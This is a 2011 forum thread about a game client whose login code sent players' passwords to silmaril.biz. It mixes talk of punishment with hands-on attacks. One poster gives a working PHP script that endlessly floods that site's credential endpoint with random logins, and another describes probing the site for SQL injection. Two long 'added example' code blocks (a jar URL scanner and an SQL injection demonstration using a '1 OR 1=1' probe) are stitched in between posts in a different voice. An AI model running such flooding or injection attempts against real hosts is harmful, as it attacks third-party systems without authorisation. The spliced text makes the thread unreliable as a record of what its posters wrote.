The Fate of Account Thieves (Portgas&co)

Forum for discussing in game politics, village relations and matters of justice.

Re: The Fate of Account Thieves (Portgas&co)

Postby BruThoL » Sun Dec 04, 2011 6:01 pm

ArvinJA wrote:I'm surprised no-one has posted this yet, but this seems to be the perp: http://www.whois.net/whois/silmaril.biz.
It's the info circulated on IRC. The offending code looked like this according to the people on IRC (his code might even be susceptible to SQL injection; I am not a script kiddie, though, so I wouldn't know how to perform it in a systematic way).
As people have already said, seems like a total script kiddie.

Do some detective work, fellas, and we'll call his mom as burgingham suggested.

Click here to send him a Christmas card.


It's not SQL injection. It's social engineering.

xXGhostxX wrote:
BruThoL wrote:
xXGhostxX wrote:Well, thanks to my programmer, he's come up with a full analysis. The client is indeed bugged with a keylogger. The .jar file has a bootstrap. Basically, you log in as always, and your password goes to a database, which is what the Russians are using to hack your account. It's a dirty trick indeed. Fortunately, there's a way to reverse the hack. For those of you who actually downloaded the .jar file, you have to recompile the .jar file. This should remove it.
Nice try AD. You suck so bad for this. You're definitely the reason why Russians have a bad reputation in this community. Once again, nice job Dis.


Am I your programmer? Because I said all of this to you, actually.

And recompiling isn't enough, need to remove the GET request first.

PM me on Skype. Also, that's part of it I forgot to add.
Edit: if you want to see the whole fight and pictures from the raid, it's on the Russian forums ;). A lot of pages, but worth it.
http://translate.google.com/translate?h ... 3Ft%3D4866


I am actually busy with trying to keep somewhat of a village.
Our LS account is still owned by them, and they are actually planning on destroying everything, it seems.
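The post above says the fix is to strip the GET request out of the client before recompiling, which assumes you know where it is. The script below is an added example, not code from the thread or from the client's author: it lists every URL literal in each class inside a .jar, which is the first check to run on any third-party client before launching it. String constants sit in the class file's constant pool as plain (modified UTF-8) bytes, so a byte-level regex over each .class entry is enough to find them. The jar it builds is a constructed sample (one fake class with the checker.php URL the thread names embedded in it, one without); pass a real jar path as the first argument to scan that instead.

```php
<?php
// Added example (not the thread's code): list URL literals per class in a .jar.
// Caveat: URLs assembled at runtime (concatenation, obfuscation, config files)
// will not show up, so no hits is not proof that a client is clean.

function find_urls_in_jar(string $jarPath): array {
    $zip = new ZipArchive();
    if ($zip->open($jarPath) !== true) {
        throw new RuntimeException("cannot open $jarPath");
    }
    $hits = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if (substr($name, -6) !== '.class') {
            continue;
        }
        $bytes = $zip->getFromIndex($i);
        if ($bytes === false) {
            continue;
        }
        // Constant-pool strings are stored as raw bytes, so a scheme followed by a
        // run of printable ASCII is a URL literal regardless of what class it sits in.
        if (preg_match_all('#https?://[\x21-\x7e]+#', $bytes, $m)) {
            foreach ($m[0] as $url) {
                $hits[$name][] = $url;
            }
        }
    }
    $zip->close();
    return $hits;
}

// Constructed sample jar: two fake "classes". Only the bytes matter here; the
// first one carries a CONSTANT_Utf8 entry (tag 1, u2 length, bytes) holding the
// endpoint the thread names, the second carries no URL at all.
$sample = tempnam(sys_get_temp_dir(), 'jar');
$zip = new ZipArchive();
$zip->open($sample, ZipArchive::OVERWRITE);
$zip->addFromString('haven/Login.class',
    "\xCA\xFE\xBA\xBE\x00\x00\x00\x32\x00\x02"
    . "\x01\x00\x29http://silmaril.biz/checker.php?a=%s&p=%s"
    . "\x00\x00");
$zip->addFromString('haven/Render.class', "\xCA\xFE\xBA\xBE\x00\x00\x00\x32\x00\x00");
$zip->close();

// Scan the jar given on the command line, or the constructed one if none was given.
$target = $argv[1] ?? $sample;
foreach (find_urls_in_jar($target) as $class => $urls) {
    echo "$class:\n";
    foreach ($urls as $u) {
        echo "  $u\n";
    }
}
unlink($sample);
```

Run it as `php scan_jar.php path/to/client.jar`. Any host that is not the game's own login server deserves an explanation before the client gets your password; a hit on a class in the login path is exactly the request the post says has to go.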

Re: The Fate of Account Thieves (Portgas&co)

Postby Galthon » Sun Dec 04, 2011 6:05 pm

Nah, what he was saying is that the URL the GET is sending to might be vulnerable to an SQL injection, depending on how much sanitizing/sanity checking he's doing on the input.

Re: The Fate of Account Thieves (Portgas&co)

Postby BruThoL » Sun Dec 04, 2011 6:10 pm

Galthon wrote:Nah, what he was saying is that the URL the GET is sending to might be vulnerable to an SQL injection, depending on how much sanitizing/sanity checking he's doing on the input.


Which is hard to know, because the web page doesn't send any data.
Also, who knows if there is a SQL DB in the background? They could simply be sending mails with login / pass (actually, I would do that).

Re: The Fate of Account Thieves (Portgas&co)

Postby Tonkyhonk » Sun Dec 04, 2011 6:12 pm

Potjeh wrote:I've been telling them ages ago that they should pull the plug if they don't have time to work on the game. I'm afraid it's too late, the damage done to the community by exploiters is too great to be reversed, and it will remain a cesspool even if the updates resume. This account theft thingie may be bad, but I think it's just a small glimpse of things yet to come.

I do get the point of you all mods saying this, but, unless devs want to keep only the few from the inner circle and don't care about others, pulling the plug is another way to damage the community more or less. Of course, I can assume that maybe you guys and devs don't need us to keep this game going and are content with just the select few, though.

This account theft is bad indeed, but those who downloaded the unknown client should have known what the internet does.
The damage this time does not sound as bad as you all say, at least to me. It has already been broken somewhat... many of us are aware of it and still playing, except for some newcomers and some others who don't read forums. It's starting to sound like you guys want all of us to stop playing so badly and obey you for your satisfaction. Sorry, but I still want to be connected to this game and some people I got to know. And I choose to play as long as devs have it up for us to play.

Worse things may be yet to come, and more people may decide to stay away. But games which stopped accepting people have harder times getting them back in general. (And I know this game is out of such a category of games wanting more players. But still.)

*edit*
jorb and loftar are pretty good at breaking my heart; they have done so twice already.
Maybe the third time comes as they read these and you get them to do what you want them to do. Then banzai for you.
Last edited by Tonkyhonk on Sun Dec 04, 2011 6:26 pm, edited 1 time in total.

Re: The Fate of Account Thieves (Portgas&co)

Postby BruThoL » Sun Dec 04, 2011 6:23 pm

Code:
<?php
$i = 0;

// Flood the credential-harvesting endpoint with random 5-character
// alphanumeric login/password pairs, the same shape as the stolen ones,
// so the real entries are buried in noise.
while (1) {
    $i++;

    $login = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789', 5)), 0, 5);
    $pass  = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789', 5)), 0, 5);

    // @ keeps the loop going if the host stops answering instead of spamming warnings.
    @file_get_contents("http://silmaril.biz/checker.php?a=$login&p=$pass");

    if ($i % 10 == 0) { echo "$i requests sent.\n"; }

    // sleep() only takes whole seconds, so sleep(0.3) gave no delay at all;
    // usleep() takes microseconds.
    usleep(300000);
}


Here is a simple php script to send them some login/passwords. :)
Last edited by BruThoL on Sun Dec 04, 2011 6:25 pm, edited 1 time in total.

Re: The Fate of Account Thieves (Portgas&co)

Postby Potjeh » Sun Dec 04, 2011 6:24 pm

I don't mean making the server invite-based, I mean having no server at all. Yes, it would completely dissipate the community. But no community is better than this community.

Back in the day we fought each other and we cared about winning, but the number one priority was improving the game itself. And that's how it should be, because the very reason we're allowed to play this is to help J&L develop the game by providing them with feedback. Nowadays, though, it's winning at any cost, even if it means actively hindering the development by providing garbage feedback. Thus, the playerbase has become worse than useless as playtesters.

It may not be a problem now because the game isn't really being developed ATM, but should the development resume it will become a major problem. The current playerbase culture is only going to get worse by then, and the community will be far too tainted to provide feedback on these new developments. The real problem is that this taint quickly spreads to newcomers, so it'll keep going even after all the current players are gone. Which is why I think that disbanding the current community altogether and starting a new one on a fresh slate when development resumes is the best option for the game.

Re: The Fate of Account Thieves (Portgas&co)

Postby Tonkyhonk » Sun Dec 04, 2011 6:34 pm

Feedback is feedback.
Garbage or not is the devs' decision and not any of ours.
Selfish play may not give them much insight, but all these horrible events do give them some thoughts, I'm sure.
It takes up more of the devs' time because many of those selfish players don't give all the info on what they were doing.
They can still see the worst-case scenarios from the already broken game where players are aware of not much (or not at all) fixing coming in.

Re: The Fate of Account Thieves (Portgas&co)

Postby bmjclark » Sun Dec 04, 2011 6:38 pm

I think a few account / town / char nukes would go a long way, considering it always seems to be the same group of people pulling this account-stealing, server-crashing shit ;)
Cajoes wrote:I was the murder victim your guy aggro'd. And slew. Entirely unprovoked. Rather handily at that. Which prompted the retaliatory party. That you also handily slew.

Re: The Fate of Account Thieves (Portgas&co)

Postby Patchouli_Knowledge » Sun Dec 04, 2011 7:30 pm

Potjeh wrote:I don't mean making the server invite-based, I mean having no server at all. Yes, it would completely dissipate the community. But no community is better than this community.

Back in the day we fought each other and we cared about winning, but the number one priority was improving the game itself. And that's how it should be, because the very reason we're allowed to play this is to help J&L develop the game by providing them with feedback. Nowadays, though, it's winning at any cost, even if it means actively hindering the development by providing garbage feedback. Thus, the playerbase has become worse than useless as playtesters.

It may not be a problem now because the game isn't really being developed ATM, but should the development resume it will become a major problem. The current playerbase culture is only going to get worse by then, and the community will be far too tainted to provide feedback on these new developments. The real problem is that this taint quickly spreads to newcomers, so it'll keep going even after all the current players are gone. Which is why I think that disbanding the current community altogether and starting a new one on a fresh slate when development resumes is the best option for the game.


It is not always possible to solve the matter by simply wiping the slate clean. Something will return when the slate returns. Given this instance, loftar may end up with a reputation as a developer under whom exploits will not be punished, and when he opens the server once more, some of the ones that had caused the game to be shut down may return to do so again. Even then, wiping the slate clean doesn't mean the problem won't appear again. People will always exploit something for personal gain, and unless you establish a firm policy on this issue, you will see the same issue rise with the only difference being other people. As a developer, you will always face this problem and need plans on how to deal with it. It is very easy to shift the blame onto those that ran a custom client, but that doesn't solve the issue that these people are performing it unhindered, and they will grow bolder and develop something that will affect you that no amount of caution will solve, such as intentional crashing of the server or even compromising the integrity of the game itself.

Also, simply not running another client won't always prevent you from being wiped out. Social engineering plays a role in being able to manipulate the mind into performing actions that will not be out of their range of ethics and standards but still into territories that you want. If it can easily be used in a major faction, it can also be applied to a degree to spreading a client. If someone had planned to screw with the entire community from the beginning, he could have been benign for a very long time and provided all of us with quality client features for a very long time. Then an authentication problem arises and he releases his next patch to rectify this, which turns out to be a keylogger. I would suspect a majority of the population here would end up being affected. How to counter this possibility? The default client.
-=The law of inverse desire=- The chances of dropping what you want is the reciprocal of how much you want it.

Re: The Fate of Account Thieves (Portgas&co)

Postby ArvinJA » Sun Dec 04, 2011 7:42 pm

BruThoL wrote:
Galthon wrote:Nah, what he was saying is that the URL the GET is sending to might be vulnerable to an SQL injection, depending on how much sanitizing/sanity checking he's doing on the input.


Which is hard to know, because the web page doesn't send any data.
Also, who knows if there is a SQL DB in the background? They could simply be sending mails with login / pass (actually, I would do that).

He's at least using mysql_real_escape_string() to sanitize his input, as we can learn from this: http://silmaril.biz/checker.php?a[]=azd&p=azd
However, I don't think he separates user input and SQL (by using prepared statements), so there are probably ways for people to SELECT his entire table and perhaps do something with it, maybe output it in an error. I don't usually do these things, though.
The low life has lost its appeal
And I'm tired of walking these streets
To a room with its cupboards bare
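Two posts in this thread circle the same question: Galthon's, that the URL the client GETs to might be injectable depending on how the input is sanitised, and ArvinJA's, that the `a[]=azd` probe shows `mysql_real_escape_string()` in use but probably no prepared statements. The script below is an added example, not the thread's code and not silmaril.biz's checker.php (nobody in the thread has seen that source). It reconstructs the pattern the posts infer, an escaped value interpolated into SQL text, beside a prepared-statement version, and reproduces the array probe. PDO with in-memory SQLite is assumed so it runs anywhere; the thread's backend is MySQL, and the two points shown (an array where a string is expected, and an unquoted numeric context where escaping has nothing to act on) behave the same way there. The credentials and the `1 OR 1=1` probe are constructed.

```php
<?php
// Added example, not code from the thread or from the site it discusses.
// Escaping vs. binding, and why the a[]= probe produced a warning.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE creds (id INTEGER PRIMARY KEY, login TEXT NOT NULL, pass TEXT NOT NULL)');

// Stand-in for mysql_real_escape_string(): SQLite only needs the quote doubled
// (MySQL's escaper also handles backslashes and NUL; the argument is the same).
function escape_value(string $v): string {
    return str_replace("'", "''", $v);
}

// Escaping-only store. With ?a[]=azd PHP hands $_GET['a'] over as an array;
// the escaper warns and nothing is stored, which is what the probe observed.
function store_escaped(PDO $db, $login, $pass): bool {
    if (!is_string($login) || !is_string($pass)) {
        trigger_error('escape_value() expects parameter 1 to be string, array given', E_USER_WARNING);
        return false;
    }
    $l = escape_value($login);
    $p = escape_value($pass);
    // Quoted context: escaping does its job here, so a=x'&p=y does not break the query.
    return $db->exec("INSERT INTO creds (login, pass) VALUES ('$l', '$p')") === 1;
}

// Escaping-only lookup in an UNQUOTED numeric context: there is no quote for
// the attacker to close, so there is nothing for the escaper to neutralise.
function lookup_escaped(PDO $db, string $id): array {
    $safe = escape_value($id);
    return $db->query("SELECT login, pass FROM creds WHERE id = $safe")->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened store: reject non-strings and anything outside the expected shape,
// then let the driver bind the values; input never touches the SQL text.
function store_prepared(PDO $db, $login, $pass): bool {
    if (!is_string($login) || !is_string($pass)
        || !preg_match('/^[A-Za-z0-9]{1,32}$/', $login) || strlen($pass) > 128) {
        return false;
    }
    $st = $db->prepare('INSERT INTO creds (login, pass) VALUES (?, ?)');
    return $st->execute([$login, $pass]);
}

// Hardened lookup: the whole input is bound as one value, so "1 OR 1=1" is
// compared against the id column as a single string and matches nothing.
function lookup_prepared(PDO $db, string $id): array {
    $st = $db->prepare('SELECT login, pass FROM creds WHERE id = ?');
    $st->execute([$id]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed traffic shaped like the query strings discussed in the thread.
store_escaped($db, 'alice', "pa'ss");      // quote in the password, stored intact
store_escaped($db, ['azd'], 'azd');        // the a[]=azd probe: warning, no row
store_prepared($db, 'bob', 'hunter2');

$probe = '1 OR 1=1';
echo 'escaped lookup rows:  ' . count(lookup_escaped($db, $probe)) . "\n";  // the OR clause is live: the whole table comes back
echo 'prepared lookup rows: ' . count(lookup_prepared($db, $probe)) . "\n"; // bound as one value: no match
```

The takeaway for reading a probe like `a[]=azd`: a warning mentioning the escaper tells you the value is being escaped before a query, not that the query is safe. Escaping only protects values that end up between quotes, which is why the usual advice is to bind every value with a prepared statement and to reject non-string input (arrays, here) before it reaches either path.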
